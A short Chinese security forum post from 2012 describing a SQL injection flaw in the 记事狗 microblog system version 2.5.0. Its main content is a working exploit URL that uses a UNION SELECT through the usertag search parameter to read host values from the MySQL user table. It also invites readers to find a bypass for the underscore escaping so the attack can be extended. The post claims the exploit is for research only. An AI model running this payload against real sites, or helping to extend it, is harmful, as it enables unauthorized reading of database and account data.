[技术挑战]记事狗2.5.0鸡肋注入漏洞

2012-06-01 110883人围观 ,发现 2 个不明物体 漏洞

无意中发现的,只测试了“记事狗微博客系统 2.5.0 UTF8 Build 20110130”

因为系统会将”_” 转换为”\_” 所以像”load_file”、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。

Exp:
/index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/mysql.user%23

EXP不会造成严重影响,且仅供研究之用。

PS:有办法的freebufer们直接回帖即可

发表评论

已有 2 条评论

取消
Loading...
css.php